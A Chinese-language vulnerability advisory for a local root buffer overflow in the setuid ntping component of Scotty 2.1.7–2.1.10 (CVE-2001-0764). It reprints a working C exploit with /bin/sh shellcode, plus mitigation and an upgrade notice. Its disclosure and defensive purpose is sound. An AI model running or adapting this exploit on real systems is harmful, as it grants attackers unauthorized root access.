Juergen Schoenwaelder scotty ntping 缓冲区溢出漏洞
发布日期:2001-06-21
更新日期:2001-07-03
受影响系统:
Juergen Schoenwaelder Scotty 2.1.9
Juergen Schoenwaelder Scotty 2.1.8
Juergen Schoenwaelder Scotty 2.1.7
Juergen Schoenwaelder Scotty 2.1.10
不受影响系统:
Juergen Schoenwaelder Scotty 2.1.11
描述:
BUGTRAQ ID: 2911
CVE(CAN) ID:
CVE-2001-0764
ntping是scotty中所带的一个组件,用来检查TCP/IP网络的状态和配置信息。它安装时被
设置了setuid root属性。
它存在一个缓冲区溢出漏洞,本地攻击者可以提供一个超长的字符串作为一个命令行参数,
如果长度超过9000字节,将触发一个缓冲区溢出。
本地攻击者可以利用这个漏洞以root身份执行任意代码。
<*来源:KF (
dotslash@snosoft.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Larry W. Cashdollar (
lwc@Vapid.dhs.org)提供了如下测试代码:
/*Larry W. Cashdollar 6/13/2001
http://vapid.dhs.org Vapid Labs
Overflows ntping for scotty-2.1.9 based on post by
dotslash@snosoft.com*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90 /*no operation skip to next instruction. */
#define LEN 590 /*our buffersize. */
/*lacks a call to setuid(0)*/
char shellcode[]= /*Aleph1's shell code. */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
__asm__ ("mov %esp, %eax");
}
int
main (int argc, char *argv[])
{
char buffer[LEN];
int i;
long retaddr = get_sp ();
/*Fill the buffer with our new address to jump to esp + offset */
for (i = 0; i < LEN; i += 4)
*(long *) &buffer[i] = retaddr + atoi (argv[1]);
/*copy the NOPs in to the buffer leaving space for shellcode and
pointers*/
printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN);
/*
for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
*(buffer + i) = NOP;*/
/*copy the shell code into the buffer*/
memcpy (buffer + i, shellcode, strlen (shellcode));
execl ("/usr/sbin/ntping", "ntping", buffer,0, 0);
}
建议:
临时解决方法:
暂时去掉ntping的suid root属性。
#chmod a-s ntping
厂商补丁:
升级到Scotty 2.1.11或者以上版本:
http://janus.cs.utwente.nl/~schoenw/scotty/
浏览次数:3778
严重程度:0(网友投票)